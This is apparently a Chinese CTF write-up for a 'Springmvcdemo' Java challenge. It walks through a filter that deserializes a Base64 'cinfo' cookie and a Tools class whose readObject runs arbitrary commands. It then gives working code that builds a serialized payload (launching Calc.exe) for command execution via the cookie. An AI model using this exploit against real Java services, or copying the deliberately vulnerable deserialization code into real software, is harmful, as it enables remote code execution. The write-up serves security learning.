-
JavaCTF记录
Springmvcdemo
在没有提升权限之前,整个环境只有Cookie是可控的,并且提升权限也是要通过cookie来,先看看它对cookie做了什么,看一下过滤器
- public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
- Cookie[] cookies = ((HttpServletRequest)request).getCookies();
- boolean exist = false;
- Cookie cookie = null;
- if (cookies != null) {
- Cookie[] var7 = cookies;
- int var8 = cookies.length;
- for(int var9 = 0; var9 < var8; ++var9) {
- Cookie c = var7[var9];
- if (c.getName().equals("cinfo")) {
- exist = true;
- cookie = c;
- break;
- }
- }
- }
- byte[] bytes;
- if (exist) {
- String b64 = cookie.getValue();
- Decoder decoder = Base64.getDecoder();
- bytes = decoder.decode(b64);
- ClientInfo cinfo = null;
- if (!b64.equals("") && bytes != null) {
- try {
- cinfo = (ClientInfo)Tools.parse(bytes);
- } catch (Exception var14) {
- var14.printStackTrace();
- }
- }
- ...
发现过滤器对cookie的处理调用了一个Tools类,再看看Tools类
- package com.tools;
- import java.io.ByteArrayInputStream;
- import java.io.ByteArrayOutputStream;
- import java.io.IOException;
- import java.io.ObjectInputStream;
- import java.io.ObjectOutputStream;
- import java.io.Serializable;
- public class Tools implements Serializable {
- private static final long serialVersionUID = 1L;
- private String testCall;
- public Tools() {
- }
- public static Object parse(byte[] bytes) throws Exception {
- ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
- return ois.readObject();
- }
- public static byte[] create(Object obj) throws Exception {
- ByteArrayOutputStream bos = new ByteArrayOutputStream();
- ObjectOutputStream outputStream = new ObjectOutputStream(bos);
- outputStream.writeObject(obj);
- return bos.toByteArray();
- }
- private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
- Object obj = in.readObject();
- (new ProcessBuilder((String[])((String[])obj))).start();
- }
- }
这个Tools类的readObject,有一个很明显的命令执行。
那么目的就很明显了,需要去触发这个readObject,也就是说需要反序列化一个Tools类
再看Tools的parse方法有一个很明显的readObject,并且也被过滤器调用了
现在链子已经清晰了。
本地构造一个Tools类
- package com.tools;
- import java.io.*;
- public class Tools implements Serializable {
- private static final long serialVersionUID = 1L;
- public static Object parse(byte[] bytes) throws Exception {
- ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes));
- return ois.readObject();
- }
- public String testCall;
- public static byte[] create(Object obj) throws Exception {
- ByteArrayOutputStream bos = new ByteArrayOutputStream();
- ObjectOutputStream outputStream = new ObjectOutputStream(bos);
- outputStream.writeObject(obj);
- return bos.toByteArray();
- }
- @Serial
- private void writeObject (ObjectOutputStream os) throws IOException {
- os . writeObject(new String[]{"Calc.exe"});
- }
- @Serial
- private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException, IOException {
- Object obj = in.readObject();
- (new ProcessBuilder((String[])obj)).start();
- }
- }
Payload
- import java.util.Base64;
- import com.tools.Tools;
- public class Payload {
- public static void main(String[] args) throws Exception {
- Tools load = new Tools();
- byte[] bytes = Tools.create(load);
- Base64.Encoder encoder = Base64.getEncoder();
- System.out.println(encoder.encodeToString(bytes));
- }
- }
将得到的数据打印出来修改cookie就成功执行命令了
-
相关阅读:
VLDB'22 HiEngine极致RTO论文解读
iOS OpenGL ES3.0入门实践
pytorch 介绍以及常用工具包展示
Linux进程控制(含进程程序替换)
h5兼容问题 复制粘贴移动端无法粘贴复制内容
js四舍五入和计算精度问题
齐博x1 你们的 上一页 下一页 还好么?
软件测试的发展趋势
【JUC源码专题】ReentrantReadWriteLock 核心源码分析(JDK8)
2010年09月06日 Go生态洞察:Go语言荣获2010年度Bossie奖
- 原文地址:https://blog.csdn.net/why811/article/details/132972325
